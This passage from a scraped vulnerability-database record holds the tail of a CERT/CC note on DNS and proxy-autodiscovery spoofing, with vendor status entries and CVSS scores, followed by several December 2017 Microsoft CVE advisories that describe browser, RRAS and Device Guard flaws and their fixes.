2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sony Corporation Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sophos, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sourcefire Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sybase Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Symantec Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TCPWave Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TP-LINK Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Technicolor Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### The Open Group Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### The SCO Group (SCO Unix) Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Tizen Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Toshiba Commerce Solutions Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TrueOS Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Turbolinux Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ubuntu Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### VMware Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vertical Networks, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Wind River Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### WizNET Technology Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Xiaomi Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Xilinx Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Zebra Technologies Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Zephyr Project Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ZyXEL Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### aep NETWORKS Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### dnsmasq Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### eero Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### gdnsd Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### iPass Inc Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### m0n0wall Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### netsnmp Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### netsnmpj Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### pfSENSE Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\nView all 226 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 0 | AV:--/AC:--/Au:--/C:--/I:--/A:-- \nTemporal | 0 | E:ND/RL:ND/RC:ND \nEnvironmental | 0 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <https://googleprojectzero.blogspot.fi/2017/12/apacolypse-now-exploiting-windows-10-in_18.html>\n * <https://www.exploit-db.com/exploits/43367/>\n\n### Acknowledgements\n\nThis attack was found, tested and reported by Ossi Salmi, Mika Sepp\u00e4nen, Marko Laakso and Kasper Kyll\u00f6nen of Arctic Security. We asked help of Jussi Eronen and Iikka Sovanto of NCSC-FI in reaching out the vendor representatives.\n\nThis document was written by Laurie Tyzenhaus and Garret Wasserman.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2017-11903](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-11903>), [CVE-2017-11810](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-11810>), [CVE-2017-11793](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-11793>), [CVE-2017-11890](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-11890>), [CVE-2017-11907](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-11907>), [CVE-2017-11906](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-11906>), [CVE-2017-11855](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-11855>) \n---|--- \n**Date Public:** | 2018-09-05 \n**Date First Published:** | 2018-09-05 \n**Date Last Updated: ** | 2018-10-23 17:34 UTC \n**Document Revision: ** | 59 \n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-05T00:00:00", "type": "cert", "title": "Automatic DNS registration and proxy autodiscovery allow spoofing of network services", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11793", "CVE-2017-11810", "CVE-2017-11855", "CVE-2017-11890", "CVE-2017-11903", "CVE-2017-11906", "CVE-2017-11907"], "modified": "2018-10-23T17:34:00", "id": "VU:598349", "href": "https://www.kb.cert.org/vuls/id/598349", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2022-10-26T18:28:15", "description": "An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nIn a web-based attack scenario, an attacker could host a website in an attempt to exploit the vulnerability. In addition, compromised websites and websites that accept or host user-provided content could contain specially crafted content that could exploit the vulnerability. However, in all cases an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action. For example, an attacker could trick a user into clicking a link that takes the user to the attacker's site.\n\nThe security update addresses the vulnerability by changing how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11919"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11919", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11919", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-26T18:28:15", "description": "An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site.\n\nTo exploit the vulnerability an attacker would have to trick a user into browsing to a malicious website or to an SMB or UNC path destination. An attacker who successfully tricked a user into disclosing the user's NTLM hash could attempt a brute-force attack to disclose the corresponding hash password.\n\nThe security update addresses the vulnerability by correcting how the Windows its:// protocol handler determines the zone of a request.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Microsoft Windows Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11927"], "modified": "2018-05-08T07:00:00", "id": "MS:CVE-2017-11927", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11927", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would need to run a specially crafted application against an RPC server which has Routing and Remote Access enabled. Routing and Remote Access is a non-default configuration; systems without it enabled are not vulnerable.\n\nThe security update addresses the vulnerability by correcting how the Routing and Remote Access service handles requests.\n", "edition": 1, "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Windows RRAS Service Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11885", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11885", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit the vulnerability, in a web-based attack scenario, an attacker could host a website in an attempt to exploit the vulnerability. In addition, compromised websites and websites that accept or host user-provided content could contain specially crafted content that could exploit the vulnerability. However, in all cases an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action. For example, an attacker could trick a user into clicking a link that takes the user to the attacker's site.\n\nThe security update addresses the vulnerability by modifying how Internet Explorer handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Internet Explorer Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11887"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11887", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11887", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nAn attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge, and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements by adding specially crafted content that could exploit the vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by way of enticement in an email or Instant Messenger message, or by getting them to open an attachment sent through email.\n\nThe security update addresses the vulnerability by modifying how Microsoft Edge handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Microsoft Edge Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11888"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11888", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11888", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A security feature bypass exists when Device Guard incorrectly validates an untrusted file. An attacker who successfully exploited this vulnerability could make an unsigned file appear to be signed. Because Device Guard relies on the signature to determine the file is non-malicious, Device Guard could then allow a malicious file to execute.\n\nIn an attack scenario, an attacker could make an untrusted file appear to be a trusted file.\n\nThe update addresses the vulnerability by correcting how Device Guard handles untrusted files.\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Device Guard Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11899"], "modified": "2018-01-25T08:00:00", "id": "MS:CVE-2017-11899", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11899", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge (HTML-based) and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11918"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11918", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11918", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge (HTML-based) and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11893"], "modified": "2017-12-12T08:00:00", "id": "MS:CVE-2017-11893", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11893", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:15", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge (HTML-based) and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 